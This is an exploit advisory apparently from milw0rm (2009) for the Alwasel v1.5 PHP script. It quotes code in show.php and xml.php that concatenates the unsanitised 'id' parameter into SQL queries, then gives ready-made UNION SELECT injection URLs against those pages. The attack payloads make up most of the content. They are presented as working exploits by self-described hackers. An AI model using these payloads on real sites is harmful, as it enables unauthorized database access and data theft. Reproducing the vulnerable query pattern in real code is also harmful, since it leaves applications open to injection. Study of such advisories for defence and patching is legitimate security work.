67 lines
No EOL
3.2 KiB
Text
67 lines
No EOL
3.2 KiB
Text
------------------Alwasel v1.5 Multiple Remote Vulnerabilities----------------------------
|
|
# #### # ### ## ### #### #### ### ## ### #### #### ### # ### #### ######
|
|
## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # #
|
|
# # # # # # # # # # # # # # # # # # # # # # # # #
|
|
# # ### # # ### # # ## ### ### # # # # ### ## # # # ### #
|
|
#### # # #### # # ###### # # # # # # # # # # # # # # #
|
|
# # # # # # # # # # # # # # ## # # # # # # # ## # #
|
|
## ## ### ## ## #### ### ### #### ### # # ### #### #### ### # ### # #### ###
|
|
|
|
|
|
#----------------------------------------------------------------------------------------------------------------
|
|
Script : Alwasel
|
|
version : 1.5
|
|
Language: PHP
|
|
Site: http://www.abushhab.com
|
|
Demo :http://alwasel.abushhab.com/1/
|
|
Info :http://abushhab.com/alwasel.html
|
|
Author: SwEET-DeViL
|
|
#----------------------------------------------------------------------------------------------------------------
|
|
|
|
)=> show.php
|
|
.................................................................................................................
|
|
if ( $_GET['id'] )
|
|
{
|
|
$qshowcinfo = @mysql_query( "SELECT * FROM cat where id = ".$_GET['id'] ); <==============={
|
|
$nshowcinfo = @mysql_num_rows( $qshowcinfo );
|
|
//###################################################################################################
|
|
if ( $_GET['id'] )
|
|
{
|
|
$qshowsinfo = @mysql_query( "SELECT * FROM site where id = ".$_GET['id']." and ok != 0 and ok != 2" ); <==============={
|
|
$nshowsinfo = @mysql_num_rows( $qshowsinfo );
|
|
|
|
.................................................................................................................
|
|
#Exploit:
|
|
|
|
http://WWW.Site.Com/alwasel/show.php?page=cat&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#--
|
|
|
|
http://WWW.Site.Com/alwasel/show.php?page=site&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16#--
|
|
|
|
-----------------------------------------------------------------------------------------------------------------
|
|
|
|
)=> xml.php
|
|
.................................................................................................................
|
|
if ( $_GET['id'] )
|
|
{
|
|
$qshowcinfo = @mysql_query( "SELECT * FROM cat where id = ".$_GET['id'] ); <==============={
|
|
$nshowcinfo = @mysql_num_rows( $qshowcinfo );
|
|
|
|
.................................................................................................................
|
|
#Exploit:
|
|
|
|
http://WWW.Site.Com/alwasel/xml.php?page=cat&id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#--
|
|
|
|
|
|
-----------------------------------------------------------------------------------------------------------------
|
|
|
|
#......>
|
|
|
|
|
|
/-------------www.arab4services.net-----------------\
|
|
|+------------------------------------------------+ |
|
|
|| SwEET-DeViL & viP HaCkEr | |
|
|
|| gamr-14(at)hotmail.com | |
|
|
|+------------------------------------------------+ |
|
|
\---------------------------------------------------/
|
|
|
|
# milw0rm.com [2009-08-07] |